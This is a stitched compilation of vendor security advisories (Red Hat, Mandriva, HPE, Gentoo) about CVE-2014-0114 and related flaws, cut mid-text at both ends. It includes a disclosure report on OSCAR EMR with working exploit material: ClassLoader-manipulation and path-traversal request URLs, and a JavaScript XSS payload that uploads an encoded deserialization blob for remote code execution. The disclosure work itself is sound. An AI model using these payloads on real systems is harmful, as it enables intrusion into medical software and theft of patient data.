vulnerability with static resources\non Windows filesystems (CVE-2018-1271)\n\n* tika: Infinite loop in BPGParser can allow remote attacker to cause a\ndenial of service (CVE-2018-1338)\n\n* tika: Infinite loop in ChmParser can allow remote attacker to cause a\ndenial of service (CVE-2018-1339)\n\n* pdfbox: Infinite loop in AFMParser.java allows for out of memory erros\nvia crafted PDF (CVE-2018-8036)\n\n* jolokia: Cross site scripting in the HTTP servlet (CVE-2018-1000129)\n\n* bouncycastle: flaw in the low-level interface to RSA key pair generator\n(CVE-2018-1000180)\n\n* bouncycastle: Carry propagation bug in math.raw.Nat??? class\n(CVE-2016-1000340)\n\n* bouncycastle: DSA key pair generator generates a weak private key by\ndefault (CVE-2016-1000343)\n\n* spring-framework: Multipart content pollution (CVE-2018-1272)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, and other related information, refer to the CVE page(s) listed in\nthe References section. \n\nRed Hat would like to thank Chris McCown for reporting CVE-2018-8088. \n\nInstallation instructions are located in the download section of the\ncustomer portal. Bugs fixed (https://bugzilla.redhat.com/):\n\n1091938 - CVE-2014-0114 Apache Struts 1: Class Loader manipulation via request parameters\n1487563 - CVE-2017-14063 async-http-client: Invalid URL parsing with '?'\n1544620 - CVE-2016-5397 thrift: Improper file path sanitization in t_go_generator.cc:format_go_output() of the go client library can allow an attacker to inject commands\n1548909 - CVE-2018-8088 slf4j: Deserialisation vulnerability in EventData constructor can allow for arbitrary code execution\n1559316 - CVE-2018-1000130 jolokia: JMX proxy mode vulnerable to remote code execution\n1559317 - CVE-2018-1000129 jolokia: Cross site scripting in the HTTP servlet\n1564408 - CVE-2018-1272 spring-framework: Multipart content pollution\n1571050 - CVE-2018-1271 spring-framework: Directory traversal vulnerability with static resources on Windows filesystems\n1572421 - CVE-2018-1338 tika: Infinite loop in BPGParser can allow remote attacker to cause a denial of service\n1572424 - CVE-2018-1339 tika: Infinite loop in ChmParser can allow remote attacker to cause a denial of service\n1573045 - CVE-2018-1114 undertow: File descriptor leak caused by JarURLConnection.getLastModified() allows attacker to cause a denial of service\n1588306 - CVE-2018-1000180 bouncycastle: flaw in the low-level interface to RSA key pair generator\n1588313 - CVE-2016-1000338 bouncycastle: DSA does not fully validate ASN.1 encoding during signature verification allowing for injection of unsigned data\n1588314 - CVE-2016-1000344 bouncycastle: DHIES implementation allowed the use of ECB mode\n1588323 - CVE-2016-1000345 bouncycastle: DHIES/ECIES CBC modes are vulnerable to padding oracle attack\n1588327 - CVE-2016-1000346 bouncycastle: Other party DH public keys are not fully validated\n1588330 - CVE-2016-1000352 bouncycastle: ECIES implementation allowed the use of ECB mode\n1588688 - CVE-2016-1000340 bouncycastle: Carry propagation bug in math.raw.Nat??? class\n1588695 - CVE-2016-1000339 bouncycastle: Information leak in AESFastEngine class\n1588708 - CVE-2016-1000341 bouncycastle: Information exposure in DSA signature generation via timing attack\n1588715 - CVE-2016-1000342 bouncycastle: ECDSA improper validation of ASN.1 encoding of signature\n1588721 - CVE-2016-1000343 bouncycastle: DSA key pair generator generates a weak private key by default\n1597490 - CVE-2018-8036 pdfbox: Infinite loop in AFMParser.java allows for out of memory erros via crafted PDF\n\n5. Summary:\n\nFuse ESB Enterprise 7.1.0 R1 P4 (Patch 4 on Rollup Patch 1), a security\nupdate that addresses one security issue, is now available from the Red Hat\nCustomer Portal. \nA remote attacker could use this flaw to manipulate the ClassLoader used by\nan application server running Struts 1. This could lead to remote code\nexecution under certain conditions. (CVE-2014-0114)\n\nRefer to the readme.txt file included with the patch files for\ninstallation instructions. \n _______________________________________________________________________\n\n References:\n\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0114\n http://advisories.mageia.org/MGASA-2014-0219.html\n _______________________________________________________________________\n\n Updated Packages:\n\n Mandriva Enterprise Server 5:\n 2341ea3fd6c92a10ab4c0be7ef5ca9da mes5/i586/struts-1.2.9-6.1mdvmes5.2.i586.rpm\n 8d911347cc4fdb08383a2d6ad21860e6 mes5/i586/struts-javadoc-1.2.9-6.1mdvmes5.2.i586.rpm\n fc1e7ac540a1d4c923cf773769c976b2 mes5/i586/struts-manual-1.2.9-6.1mdvmes5.2.i586.rpm\n 3304297e4b88aae688e8edcdd11bf478 mes5/i586/struts-webapps-tomcat5-1.2.9-6.1mdvmes5.2.i586.rpm \n b508c226756fcb2a82a8b5e2e84af466 mes5/SRPMS/struts-1.2.9-6.1mdvmes5.2.src.rpm\n\n Mandriva Enterprise Server 5/X86_64:\n 7e2abd47c0862fa5010ee686d76d2353 mes5/x86_64/struts-1.2.9-6.1mdvmes5.2.x86_64.rpm\n 96dd8e36bf4b46577498ad8616dce319 mes5/x86_64/struts-javadoc-1.2.9-6.1mdvmes5.2.x86_64.rpm\n 37a1b595d7f2f73bdff8d13bcb70e0a6 mes5/x86_64/struts-manual-1.2.9-6.1mdvmes5.2.x86_64.rpm\n 8c298a1e1e9e8ad81acb0166b2f18109 mes5/x86_64/struts-webapps-tomcat5-1.2.9-6.1mdvmes5.2.x86_64.rpm \n b508c226756fcb2a82a8b5e2e84af466 mes5/SRPMS/struts-1.2.9-6.1mdvmes5.2.src.rpm\n\n Mandriva Business Server 1/X86_64:\n 1e1b9440affefd05d5fe0c4860fdcd9b mbs1/x86_64/struts-1.3.10-3.1.mbs1.noarch.rpm\n 5ae68b0b7f991676f67562a51dd956a7 mbs1/x86_64/struts-javadoc-1.3.10-3.1.mbs1.noarch.rpm \n f135f96b6d2121b157b7a62afd449ea6 mbs1/SRPMS/struts-1.3.10-3.1.mbs1.src.rpm\n _______________________________________________________________________\n\n To upgrade automatically use MandrivaUpdate or urpmi. The verification\n of md5 checksums and GPG signatures is performed automatically for you. \n\n All packages are signed by Mandriva for security. You can obtain the\n GPG public key of the Mandriva Security Team by executing:\n\n gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98\n\n You can view other update advisories for Mandriva Linux at:\n\n http://www.mandriva.com/en/support/security/advisories/\n\n If you want to report vulnerabilities, please contact\n\n security_(at)_mandriva.com\n _______________________________________________________________________\n\n Type Bits/KeyID Date User ID\n pub 1024D/22458A98 2000-07-10 Mandriva Security Team\n <security*mandriva.com>\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.12 (GNU/Linux)\n\niD8DBQFTdeNbmqjQ0CJFipgRAo5XAJ4oaaS6iRfHSPHEO3og+Se4kWkdfgCgrhMb\nHUtc9GTxbEwte2/fTU7bJ5M=\n=5Ewj\n-----END PGP SIGNATURE-----\n. Title: Multiple vulnerabilities in OSCAR EMR\nProduct: OSCAR EMR\nVendor: Oscar McMaster\nTested version: 15.21beta361\nRemediation status: Unknown\nReported by: Brian D. Hysell\n\n-----\n\nProduct Description:\n\n\"OSCAR is open-source Electronic Medical Record (EMR) software that\nwas first developed at McMaster University by Dr. David Chan. It is\ncontinuously enriched by contributions from OSCAR users and the\nCharter OSCAR Service Providers that support them. OSCAR has been\ncertified by OntarioMD, and verified as IHE compliant, achievements\nmade possible by the creation and success of OSCAR EMRas ISO\n13485:2003 certified Quality Management System.\"\n\n-----\n\nTimeline:\n\n29 Mar 2016 - Vendor contacted\n29 Mar 2016 - Vendor responded\n29 Apr 2016 - Vendor contacted for permission to share redacted report\nwith third party\n02 May 2016 - Vendor responded\n17 Jan 2017 - Lead developer contacted (no response)\n01 Jul 2018 - Vendor and lead developer contacted for follow-up,\ninformed of intended 15 Aug disclosure (no response)\n12 Aug 2018 - Alternate email address attempted for lead developer (no response)\n15 Aug 2018 - Vulnerabilities publicly disclosed\n\n-----\n\nContents:\n\nThis report uses OVE identifiers: http://www.openwall.com/ove/\n\nOVE-20160329-0001: Database backup disclosure or denial of service via\ninsecure dependency\nOVE-20160329-0003: Remote code execution via unsafe object deserialization\nOVE-20160329-0004: Stored cross-site scripting (XSS) vulnerability in\nsecurity report interface\nOVE-20160329-0007: SQL injection\nOVE-20160329-0008: Path traversal\nOVE-20160329-0002: Insecure direct object reference in document manager\nOVE-20160329-0005: Denial of service via resource exhaustion\nOVE-20160329-0006: Insecure password storage\nOVE-20160329-0009: Cross-site request forgery\n\n-----\n\nIssue details:\n\n=== OVE-20160329-0001: Database backup disclosure or denial of service\nvia insecure dependency ===\n\nOSCAR uses a version of Apache Struts, 1.2.7, which is vulnerable to\nCVE-2014-0114. \n\nAn authenticated user can issue the following request with different /\nomitted cookie headers:\n/oscar/login.do?class.classLoader.resources.dirContext.docBase=/var/lib/tomcat7/webapps/OscarDocument/oscar_mcmaster\n\nConsequently, he or she can access (using a valid session cookie),\ne.g., /oscar/OscarBackup.sql.gz\n\nAn unauthenticated attacker is prevented from doing likewise by the\naLoginFiltera servlet filter, but can still carry out a\ndenial-of-service attack impeding any access to the application until\nTomcat is restarted by issuing a request like the following:\n/oscar/login.do?class.classLoader.resources.dirContext.docBase=invalid\n\n=== OVE-20160329-0003: Remote code execution via unsafe object\ndeserialization ===\n\nTraceabilityReportProcessor deserializes user-provided data, allowing\nremote code execution given the presence of known-vulnerable libraries\nin the classpath such as ROME 1.0. This functionality is only\navailable to administrators but can be exploited via XSS\n(OVE-20160329-0004) or CSRF (issue 9) using a payload generated with\nysoserial. \n\nIn the tested configuration PMmodule/GenericIntake/ImportForm.jsp is\ninaccessible due to the following exception\naorg.springframework.beans.factory.NoSuchBeanDefinitionException: No\nbean named 'oscarSecurityManager' is defineda, but were it to be\naccessible, it would be vulnerable as well. \n\n=== OVE-20160329-0004: Stored cross-site scripting (XSS) vulnerability\nin security report interface ===\n\nlogReport.jsp, in general, does not escape data it outputs to the\npage; in particular, on line 283, prop.getProperty(\"contentId\") is\nprinted unescaped. As a result, if an attacker includes Javascript in\nhis or her username during a login attempt, it will be executed if an\nadministrator views the Security Log Report for that timeframe. The\ntext printed in the \"Keyword\" column is cut off at 80 characters, but\nthat is more than enough to load an externally-hosted script, such as\nthe following script exploiting the deserialization RCE\nOVE-20160329-0003:\n\nvar decodedBase64 =\natob(\"H4sIAJ8881YAA61WzW8bRRR/YyfexHWaJs1Xm6ZNSUvdtN3NR5M0uKJt0qZ1cEhFQnvwwYzXU2fDene7O5tsOHBA4sIBCcGFfwAOtIdKCBCVkCrEBU5InEBFXOBGOVRFXPh4M+vEbhJiU7rSvtl9895v3rz35s279Ss0ei60LdMVqvrcMNUr1Fuao06j8v29L7te+TYKkRmImzYtzFCd224amvmSy7wl2ywEzrnzIJ/VJiQR8SJYUrdLqudbqrdmFQydcsO21BuMFVSj5JjqfH6Z6XyKUeuN95UfVxrem41ANAO7c7ppW4zmTSbmOJzKII6GOFoVjiZwNIGjTVeLpzKwK8du+tT0Qu3BGtqXNmRRtSXH7QXuGlYxVD5ZQ3mxSjoVOLjnEzvv+TFb79O7X43Ov7oagUgG2nJG0bJddtW1HeZyg3kcWjMiHJoIh7bAOBrYkLPzyxzawwmTWkUtdGO4+sFK+KZt00Q+Lu8duVRy+BoCdD5y+z6OfpPEAKH4TXgdwySoIkgC9Z9bt952iyp1qL7E1IDiMqphceZa1FQDz+S6yl0aqIsMt0Q589I4Nl+fv2fd+mg0CrE0+tGwCsziL/qlPMNU2Z1DBcszGU8jP8hCPJdf40y3C2Kb0Wx2KgsxjDv18Lc9W7W7acHDjTfmLFpij+889H1K+M72uePzat91Vfmuwkc3iTT9Gx/flQu/8Oe+zmLxhwnpE5G4yI9kp2497P4j1rT4U5kde/Prvz7/AqeH4UwcovCMAuMKHFXgWQJ7POYa1LzGXA+9/XL6IgEyS6BlGl3PMYuuUdNnjbf73334zv3fnicQO2tYBsePaPL4NQIN0+gFgrE2LBb6a1EkCMGt2jrCUgTH/zKzgS8ZHoG9C9zPL5Z9epWuiXNJIJG2LOZKlzEUGsuseXZonOaEMl7okMu0UGTcO7INSorgwRasG7ZbIuAmN44A5oQW5oQmc0JbzwlN5oR2cX4uld1WumRWZEN7jNeYiykdfspDcoVaBZO5KeGSpoKt+yXMH1J1+OtZHlWXQhzc/tT/N4ZA/FKgM0ceIwWOEfjgv/mjpgUFXtIuLs5dCAwvjSyKlbW2Ul0+NMpwIg+exAoCStmXBC48DU8u2L6rsxlDpHGinIGqOKQJiMMuBZIERp8gYQmcrzcirm9xo8S0C3kPU1zn60gEOmSxMOyK8fK0TdaLvI60kS0EDtXYC4borG6WS0Fbpaq9FBqpwCD6DAXL/wQ6k8czW8RSCTgJp+JwAlQERBOY0z8y1ARDWCpYwHQCx5JbS2Y1EBZHnWGNTcAIjAqg0wQOVmy/uoolZWxybHxyaPz00PjI8JmJEQL9mZ0lUnAY24AooBX47odGiOGoyOagSfIw5EgTyNFwJDg2Dn4K5I4UaUEak0wVdiNNhALQChM4YvmDDpQSyufwjQreZsVRqdgfTpYVxVcndMl5At3Qgxr78Du0UcD2lmHTkrsN7ISEHQwnt4U9AH2yA0IvwiFcvrJAExzf2HQvzgip1g8hSjKfgdY+/AmMXb8j4SJot6CHoQ3HOKpEYAD2QLMvLupuxP5u4zrqFddRpwLdCvQosK/e6+jmL8aDs6XLPU/nOorO2PaW6+dozesHteopDPsJDNQBhVvf3BX968GudTh3TF9Sf/qmNqVvu5zfK2lHVXS7RHQdDg14mFxnlUBQu3+udK6P3uq5+/PvPW2ykcTWClnTYS/Vtk0rJXtIkUjNgbPiQp+QCFSs5urGvV9p7aDyBI5Q6kDDBnc2rLorbn709mzrwIPhzaYJqAOP2yKGQ+ESgvauyAZVkBbJ6BdkQP4LEquQ4B9DtscYvgwAAA==\");\nvar binaryArray = new Uint8Array(new ArrayBuffer(decodedBase64.length));\nfor(var i = 0; i < binaryArray.length; i++) {\n binaryArray[i] = decodedBase64.charCodeAt(i);\n}\nvar payload = new Blob([binaryArray], {type: \"application/x-gzip\"});\nvar formData = new FormData();\nformData.append(\"file\", payload);\nformData.append(\"submit\", \"Generate\");\nvar xhr = new XMLHttpRequest();\nxhr.open(\"POST\", \"/oscar/admin/GenerateTraceabilityReportAction.do\");\nxhr.send(formData);\n\nXSS was not a focus of this test; other confirmed or likely XSS\nvulnerabilities are:\n* Reflected XSS through the errormsg parameter in loginfailed.jsp\n* Reflected XSS through the signatureRequestId parameter in tabletSignature.jsp\n* Reflected XSS through the noteId parameter, line 1562 in\nCaseManagementViewAction (untested)\n* Reflected XSS through the pdfName parameter when an exception has\nbeen thrown, line 1174 in ManageDocumentAction (untested)\n* Reflected XSS through the pharmaName and pharmaFax parameters, line\n149 in FrmCustomedPDFServlet (untested)\n* Reflected XSS through the id and followupValue parameters, line 81\nin EctAddShortMeasurementAction (untested)\n\n=== OVE-20160329-0007: SQL injection ===\n\nOn line 239 of oscarMDS/PatientSearch.jsp, the orderby parameter is\nconcatenated into an SQL statement rather than parameterized; likewise\nthe content parameter on lines 217, 223, and 229 of\nadmin/logReport.jsp. In both cases these errors result in error-based\nSQL injection vulnerabilities; the former allows authenticated users\nwith access to oscarMDS/PatientSearch.jsp to access information beyond\ntheir privilege levels while the latter is accessible only to\nadministrators. \n\n=== OVE-20160329-0008: Path traversal ===\n\nImportLogDownloadAction reads and outputs an arbitrary absolute file\npath provided by the user; DelImageAction deletes a user-specified\nfilename without accounting for the possibility of relative path\ntraversal (i.e., the inclusion of \"../\" in the filename). \n\nAny authenticated user can exploit the former issue to steal files\nfrom the system, e.g.,\n/oscar/form/importLogDownload.do?importlog=/var/lib/tomcat7/webapps/OscarDocument/oscar_mcmaster/OscarBackup.sql.gz\n\nAn authenticated user with access to eforms can delete files writeable\nby the Tomcat user, e.g.,\n/oscar/eform/deleteImage.do?filename=../../../../oscar/index.jsp\n\n=== OVE-20160329-0002: Insecure direct object reference in document manager ===\n\nManageDocumentAction.display() does not check the permissions\nassociated with the requested document ID (doc_no) before providing it\nto the requesting user. Given\n/oscar/dms/ManageDocument.do?method=display&doc_no=X&providerNo=Y, a\nuser with access to the document management interface can view\narbitrary documents by incrementing or decrementing X, regardless of\nwhether they have been marked private. \n\n=== OVE-20160329-0005: Denial of service via resource exhaustion ===\n\nuploadSignature.jsp, which is accessible to and operable by\nunauthenticated users, saves uploaded files to a temporary directory\nbut never deletes them. An attacker can upload many junk files and\neventually consume all disk space available to the /tmp directory,\nimpeding access to the application depending on the functionality in\nquestion and the partition layout of the host system (the effects are\ncrippling and pervasive if /tmp is on the same partition as /; they\nare much less so if /tmp is on a separate partition). \n\n=== OVE-20160329-0006: Insecure password storage ===\n\nPasswords are stored as SHA-1 hashes; unless unusually complex,\npasswords stored in that manner are typically easily recoverable with\na tool such as oclHashcat. In OSCAR each hash is stored as a string of\ndecimal numbers, rather than hexadecimal or raw bytes. This somewhat\nnon-traditional representation adds a bit of programming work to the\ncracking process, but does not represent a major impediment to attack. \n\n=== OVE-20160329-0009: Cross-site request forgery ===\n\nThe application lacks protection against cross-site request forgery\nattacks. A CSRF attack could be used against an administrator to\nexploit the deserialization RCE in a manner similar to the example\nprovided with OVE-20160329-0004. \n\nReferences:\n\nCVE-2014-0114 (SSRT101662)\n\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. \n\nSiteScope Affected version\n Resolution patch details\n Link to download\n\n11.1x\n SiteScope 11.13 Windows 32-bit Cumulative Fixes\n http://support.openview.hp.com/selfsolve/document/LID/SIS_00315\n\n SiteScope 11.13 Windows 64-bit Cumulative Fixes\n http://support.openview.hp.com/selfsolve/document/LID/SIS_00316\n\n SiteScope 11.13 Linux 32-bit Cumulative Fixes\n http://support.openview.hp.com/selfsolve/document/LID/SIS_00317\n\n SiteScope 11.13 Linux 64-bit Cumulative Fixes\n http://support.openview.hp.com/selfsolve/document/LID/SIS_00318\n\n SiteScope 11.13 Solaris 32-bit Cumulative Fixes\n http://support.openview.hp.com/selfsolve/document/LID/SIS_00319\n\n SiteScope 11.13 Solaris 64-bit Cumulative Fixes\n http://support.openview.hp.com/selfsolve/document/LID/SIS_00320\n\n11.2x\n SiteScope 11.24.271 Intermediate Patch for Windows 32bit and 64bit\n http://support.openview.hp.com/selfsolve/document/LID/SIS_00321\n\n SiteScope 11.24.271 Intermediate Patch for Windows 32bit on 64bit\n http://support.openview.hp.com/selfsolve/document/LID/SIS_00322\n\n SiteScope 11.24.271 Intermediate Patch for Linux\n http://support.openview.hp.com/selfsolve/document/LID/SIS_00323\n\n SiteScope 11.24.271 Intermediate Patch for Solaris\n http://support.openview.hp.com/selfsolve/document/LID/SIS_00324\n\nHISTORY\nVersion:1 (rev.1) - 12 August 2014 Initial release\n\nThird Party Security Patches: Third party security patches that are to be\ninstalled on systems running HP software products should be applied in\naccordance with the customer's patch management policy. \nHewlett-Packard Company shall not be liable for technical or editorial errors\nor omissions contained herein. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\nGentoo Linux Security Advisory GLSA 201607-09\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n https://security.gentoo.org/\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n Severity: Normal\n Title: Commons-BeanUtils: Arbitrary code execution\n Date: July 20, 2016\n Bugs: #534498\n ID: 201607-09\n\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\nSynopsis\n========\n\nApache Commons BeanUtils does not properly suppress the class property,\nwhich could lead to the remote execution of arbitrary code. \n\nWorkaround\n==========\n\nThere is no known workaround at this time. \n\nResolution\n==========\n\nAll Commons BeanUtils users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot -v \">=dev-java/commons-beanutils-1.9.2\"\n\nReferences\n==========\n\n[ 1 ] CVE-2014-0114\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0114\n\nAvailability\n============\n\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n https://security.gentoo.org/glsa/201607-09\n\nConcerns?\n=========\n\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users' machines is of utmost\nimportance to us. Any security concerns should be addressed to\nsecurity@gentoo.org or alternatively, you may file a bug at\nhttps://bugs.gentoo.org. \n\nLicense\n=======\n\nCopyright 2016 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttp://creativecommons.org/licenses/by-sa/2.5\n\n. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n==================================================================== \nRed Hat Security Advisory\n\nSynopsis: Important: Red Hat A-MQ Broker 7.5 release and security update\nAdvisory ID: RHSA-2019:2995-01\nProduct: Red Hat JBoss AMQ\nAdvisory URL: https://access.redhat.com/errata/RHSA-2019:2995\nIssue date: 2019-10-10\nKeywords: amq,messaging,integration,broker\nCross references: RHEA-2019:45713-01\nCVE Names: CVE-2014-0114\n====================================================================\n1. Summary:\n\nRed Hat A-MQ Broker 7.5 is now available from the Red Hat Customer Portal. \n\nRed Hat Product Security has rated this update as having a security impact\nof Important. A Common Vulnerability Scoring System (CVSS) base score,\nwhich gives a detailed severity rating, is available for each vulnerability\nfrom the CVE link(s) in the References section. \n\n2. Description:\n\nAMQ Broker is a high-performance messaging implementation based on ActiveMQ\nArtemis. It uses an asynchronous journal for fast message persistence, and\nsupports multiple languages, protocols, and platforms. \n\nThis release of Red Hat A-MQ Broker 7.5.0 serves as a replacement for Red\nHat A-MQ Broker 7.4.1, and includes security and bug fixes, and\nenhancements. For further information, refer to the release notes linked to\nin the References section. \n\nSecurity Fix(es):\n\n* Apache Struts 1: Class Loader manipulation via request parameters\n(CVE-2014-0114)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, and other related information, refer to the CVE page(s) listed in\nthe References section. \n\n3. Solution:\n\nBefore applying the update, back up your existing installation, including\nall applications, configuration files, databases and database settings, and\nso on. \n\nThe References section of this erratum contains a download link (you must\nlog in to download the update). \n\n4. Bugs fixed (https://bugzilla.redhat.com/):\n\n1091938 - CVE-2014-0114 Apache Struts 1: Class Loader manipulation via request parameters\n\n5. JIRA issues fixed (https://issues.jboss.org/):\n\nENTMQBR-2849 - CVE-2014-0114 Apache Struts 1: Class Loader manipulation via request parameters [amq-7.4.0]\n\n6. References:\n\nhttps://access.redhat.com/security/cve/CVE-2014-0114\nhttps://access.redhat.com/security/updates/classification/#important\nhttps://access.redhat.com/jbossnetwork/restricted/listSoftware.html?downloadType=distributions&product=jboss.amq.broker&version=7.5.0\nhttps://access.redhat.com/documentation/en-us/red_hat_amq/7.5/\n\n7. Contact:\n\nThe Red Hat security contact is <secalert@redhat.com>. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2019 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niQIVAwUBXZ7b4tzjgjWX9erEAQhy1BAAlZY3SIVWWf78mbhIhS4x+DCzq6s6W+B7\ngh7bSOfLCqLNVyuqI99PH920CgZwtrN01VVt2by822MdIKKKHtbjFTzstm1ucLso\nQlYBLkmPzkC0xGPP4q67EDhr5KctJ4wlkerTnBhfwJxvFBLZnWzgGvmawbf3X7iQ\nqWwigzfVjiUwen7pv5Bol4WkzhTbvUxPEVDS696ziJI0zPyqnnDXpl+9lnXcYL0m\nGLsD59I984+gLxpl9fzgOPZxm2U1gGusO5rM9vUPmGX06XJo1nsUKUuhRfLoNwQm\nYcK6yVFE+TAOAKbmM2o62hnA/+UemV/bBQJh3ymVgjcHSz8UYae4vfmiPfiyBsVv\nSTakDzO5yz+htMLJWVAnHjLEgbcGgzrH7jqXLzNO47bZR0oVVP6RjZnsZCdhxeT7\nmPZtwWSVHFl8GRriGvEKQjC27Majwva5Hnwh82IPr5lgbLpWmvQSBzDHIObdyPts\nUYk+zBhZHNXzdQrnEA2BzhsXehZiMigKefutBPPEc+iXjFsLSTmGYceECyhUP/No\nRuQTYanb0GdgPDpgCOoDIgPtY3VyMiCur8BkQKGIyJt4aXdSaBoqAXt4KypAFExG\nlRVXHA8RRVcnqsxcpCA+VesIbPuTzmCSsgkQckv/TGLFgdAMLOA4J38bUCjulvMm\n9D+Pu+r8KbU=kdcn\n-----END PGP SIGNATURE-----\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\nNote: the current version of the following document is available here:\nhttps://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c05324755\n\nSUPPORT COMMUNICATION - SECURITY BULLETIN\n\nDocument ID: c05324755\nVersion: 1\n\nHPSBGN03669 rev.1 - HPE SiteScope, Local Elevation of Privilege, Remote\nDenial of Service, Arbitrary Code Execution and Cross-Site Request Forgery\n\nNOTICE: The information in this Security Bulletin should be acted upon as\nsoon as possible. \n\nRelease Date: 2016-11-04\nLast Updated: 2016-11-04\n\nPotential Security Impact: Local: Elevation of Privilege; Remote: Arbitrary\nCode Execution, Cross-Site Request Forgery (CSRF), Denial of Service (DoS)\n\nSource: Hewlett Packard Enterprise, Product Security Response Team\n\nVULNERABILITY SUMMARY\nPotential vulnerabilities have been identified in HPE SiteScope. The\nvulnerabilities could be exploited to allow local elevation of privilege and\nexploited remotely to allow denial of service, arbitrary code execution,\ncross-site request forgery. \n\nReferences:\n\n - CVE-2014-0114 - Apache Struts, execution of arbitrary code\n - CVE-2016-0763 - Apache Tomcat, denial of service (DoS)\n - CVE-2014-0107 - Apache XML Xalan, bypass expected restrictions \n - CVE-2015-3253 - Apache Groovy, execution of arbitrary code \n - CVE-2015-5652 - Python, elevation of privilege\n - CVE-2013-6429 - Spring Framework, cross-site request forgery\n - CVE-2014-0050 - Apache Commons FileUpload, denial of service (DoS)\n - PSRT110264\n\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. \n\n - HP SiteScope Monitors Software Series 11.2xa11.32IP1\n\nBACKGROUND\n\n CVSS Base Metrics\n =================\n Reference, CVSS V3 Score/Vector, CVSS V2 Score/Vector\n\n CVE-2013-6429\n 6.5 CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:L\n 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)\n\n CVE-2014-0050\n 8.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L\n 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)\n\n CVE-2014-0107\n 8.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L\n 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)\n\n CVE-2014-0114\n 6.8 CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L\n 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)\n\n CVE-2015-3253\n 7.1 CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L\n 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)\n\n CVE-2015-5652\n 8.6 CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H\n 7.2 (AV:L/AC:L/Au:N/C:C/I:C/A:C)\n\n CVE-2016-0763\n 6.3 CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L\n 6.5 (AV:N/AC:L/Au:S/C:P/I:P/A:P)\n\n Information on CVSS is documented in\n HPE Customer Notice HPSN-2008-002 here:\n\nhttps://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c01345499\n\nRESOLUTION\n\nHPE has provided a resolution via an update to HPE SiteScope. Details on the\nupdate and each vulnerability are in the KM articles below. \n\n **Note:** The resolution for each vulnerability listed is to upgrade to\nSiteScope 11.32IP2 or an even more recent version of SiteScope if available. \nThe SiteScope update can be can found in the personal zone in \"my updates\" in\nHPE Software Support Online: <https://softwaresupport.hpe.com>. \n\n\n * Apache Commons FileUpload: KM02550251 (CVE-2014-0050): \n\n +\n<https://softwaresupport.hpe.com/group/softwaresupport/search-result/-/facets\narch/document/KM02550251>\n\n\n * Apache Struts: KM02553983 (CVE-2014-0114):\n\n +\n<https://softwaresupport.hpe.com/group/softwaresupport/search-result/-/facets\narch/document/KM02553983>\n\n\n * Apache Tomcat: KM02553990 (CVE-2016-0763):\n\n +\n<https://softwaresupport.hpe.com/group/softwaresupport/search-result/-/facets\narch/document/KM02553990>\n\n * Apache XML Xalan: KM02553991 (CVE-2014-0107):\n\n +\n<https://softwaresupport.hpe.com/group/softwaresupport/search-result/-/facets\narch/document/KM02553991>\n\n * Apache Groovy: KM02553992 (CVE-2015-3253):\n\n +\n<https://softwaresupport.hpe.com/group/softwaresupport/search-result/-/facets\narch/document/KM02553992>\n\n * Python: KM02553997 (CVE-2015-5652):\n\n *\n<https://softwaresupport.hpe.com/group/softwaresupport/search-result/-/facets\narch/document/KM02553997>\n\n * Spring Framework: KM02553998 (CVE-2013-6429):\n\n +\n<https://softwaresupport.hpe.com/group/softwaresupport/search-result/-/facets\narch/document/KM02553998>\n\nHISTORY\nVersion:1 (rev.1) - 4 November 2016 Initial release\n\nThird Party Security Patches: Third party security patches that are to be\ninstalled on systems running Hewlett Packard Enterprise (HPE) software\nproducts should be applied in accordance with the customer's patch management\npolicy. \n\nSupport: For issues about implementing the recommendations of this Security\nBulletin, contact normal HPE Services support channel. For other issues about\nthe content of this Security Bulletin, send e-mail to security-alert@hpe.com. \n\nReport: To report a potential security vulnerability for any HPE supported\nproduct:\n Web form: https://www.hpe.com/info/report-security-vulnerability\n Email: security-alert@hpe.com\n\nSubscribe: To initiate a subscription to receive future HPE Security Bulletin\nalerts via Email: http://www.hpe.com/support/Subscriber_Choice\n\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\navailable here: http://www.hpe.com/support/Security_Bulletin_Archive\n\nSoftware Product Category: The Software Product Category is represented in\nthe title by the two characters following HPSB. \n\n3C = 3COM\n3P = 